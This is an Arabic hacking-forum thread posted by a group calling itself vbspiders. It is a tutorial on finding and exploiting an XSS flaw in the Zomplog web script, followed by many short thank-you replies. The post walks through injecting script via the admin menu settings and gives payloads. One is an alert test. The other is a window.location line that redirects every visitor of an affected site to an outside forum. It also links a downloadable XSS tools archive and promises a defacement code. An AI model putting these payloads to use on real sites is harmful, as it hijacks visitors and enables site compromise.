السلام عليكم ورحمة الله وبركاته :! اليوم راح تفهو كل شيئ عن ثغرة xss بئذن الله ! الدرس مقدم من فريق العناكب اولا شيئ السكريبت للتحميل Zomplog الان...

شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
السلام عليكم ورحمة الله وبركاته :!

اليوم راح تفهو كل شيئ عن ثغرة xss بئذن الله !

الدرس مقدم من فريق العناكب

اولا شيئ السكريبت

للتحميل

Zomplog

الان ننصب السكريبت على السيرفر الشخصي تمام

الان صورة من السكريبت

:6:

3oMQ7-Itj4_574938196.png


http://www.iraqup.com/up/20110914/3oMQ7-Itj4_574938196.png

الان وش نسوي

.. نبي نشوف الكسريبت مصا ام لا

كيف فيه اكواد جافا لاستغلال xss

مثال راح نشوف

:msn-wink:

**********alert("vbspiders");</script>

انا راح اامر ب تنفيذ الامر ده من لوحة التحكم لانو ما نجح من البحث المهم

نشوف

gDw47-yNU6_303051970.png


الان بعد ما سجلنا الدخول نفوت على



System Settings



ثم
Menu settings


وننزل الاسفل ونحط الكود


**********alert("vbspiders");</script>

5t2Gl-cB3A_501790403.png


http://www.iraqup.com/up/20110914/5t2Gl-cB3A_501790403.png

نذهب لرئيسية الموقع ونشوف وش يحدث
P2rG7-f1xF_381500894.png


http://www.iraqup.com/up/20110914/P2rG7-f1xF_381500894.png


تمام انتهى الشرح الاوامر الان

PHP:
**********alert("vbspiders");</script>
لمعرفة ان كان مصاب ام لا

لتحويل كل من يدخل الموقع الي موقع الي تريدها انت


PHP:
**********window.location = "http://www.vbspiders.com/vb/"</script>

اذا ماظهرت الكواد بسبب الحماية لتحميل ملف .txt

من المرفقات




اما بخصوص كود حقن الاندكس راح اجيبهولكم دقيايق فقط :bleh:


او شرح الغالي فولكانو

الشرح للاخ فولكانو

http://www.youtube.com/watch?v=iRLvhhXI_TY

هذه الادوات http://www.4shared.com/file/RB_W_UaQ/xss.html



ان شاء الله ماقصرت معاكم بالتوفيق :bye1:

Q2q1x-vI5T_481013865.png
 

المرفقات

  • code.zip
    code.zip
    196 بايت · المشاهدات: 188
التعديل الأخير:
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

ماشاء الله عليك حبيبي :)
 

2shebl

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

مشكوووووووووووووووووووووووور اخي
 

gretful

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

good
but
???................
 

arabo04

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

الله عليك يا حبيب والديك
 

sassakasba

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

merciiiiiiiiiiiiiiiiiiiiiiiiiii
 

fighters

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

tnxxxx
 

abdellatef

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

يسلمو حبووب الموضوع في القمة والله
 

shenigamy

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

merci
 

iZooM

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

:shiny::shiny::shiny:
 
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

يعطيك العااااااافيه

ياااااغاااااالي لاهنت على الطرح
 

black pirate

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

شكرالك يغالي:7:الموضوع رائع
 

gastro

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

بارك الله فيك حبيبي
 

EG-HaCKeR

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

الله يعطيكـ الف عافيه
 

H4m1d

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

لم توضح طريقة تنصيب الكريبت
 

InJuries Yemen

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

يعطيك الــف عافيــه يا بطل
 

silent007

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

very nice
 

tahooo

New Member
شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!
رد: شرح اكتشاف ثغرة XSS + التطبيق على سكريبت حي حصرياااا !!

شكرا ياغالي
 
أعلى